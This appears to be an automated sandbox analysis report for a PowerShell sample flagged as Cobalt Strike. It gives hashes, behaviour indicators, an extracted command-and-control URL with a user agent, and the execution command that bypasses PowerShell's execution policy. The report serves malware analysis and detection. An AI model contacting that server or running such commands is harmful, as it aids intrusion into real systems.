Analysis
-
max time kernel
114s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
29-03-2023 06:38
Static task
static1
Behavioral task
behavioral1
Sample
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
Resource
win10v2004-20230220-en
General
-
Target
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
-
Size
26KB
-
MD5
c9ebd0d057c99b70ba8e955a0f51f72f
-
SHA1
ee2323f856b397a7c0ce1feb6677152376e96da5
-
SHA256
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768
-
SHA512
c8a1b27243b3526acd38052639574a201f82d96dca2c5a3e753d05c75dc5d21a7984cc66bcda04ea27199e846359695c118ba7cf2162d4ca95cc569147bb7d74
-
SSDEEP
384:pIAUl9V5xJCdNz6etOzzodsGeE3WdbSU0jRArxJDZF6boFUUC7+v6fCUqqgCENqn:uAUjKz6r5GeW+bOoCvK/imC6YEaxP
Malware Config
Extracted
cobaltstrike
http://43.136.14.33:50001/GSmV
-
user_agent
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; UHS)
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 20 IoCs
Processes:
powershell.exeflow pid process 3 1768 powershell.exe 4 1768 powershell.exe 5 1768 powershell.exe 6 1768 powershell.exe 7 1768 powershell.exe 8 1768 powershell.exe 10 1768 powershell.exe 11 1768 powershell.exe 12 1768 powershell.exe 14 1768 powershell.exe 15 1768 powershell.exe 16 1768 powershell.exe 18 1768 powershell.exe 19 1768 powershell.exe 20 1768 powershell.exe 21 1768 powershell.exe 22 1768 powershell.exe 23 1768 powershell.exe 24 1768 powershell.exe 26 1768 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1768 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps11⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1768-58-0x000000001B300000-0x000000001B5E2000-memory.dmpFilesize
2.9MB
-
memory/1768-59-0x0000000002470000-0x0000000002478000-memory.dmpFilesize
32KB
-
memory/1768-60-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-61-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-62-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-63-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-64-0x0000000002950000-0x0000000002951000-memory.dmpFilesize
4KB
-
memory/1768-65-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-66-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-67-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/1768-68-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB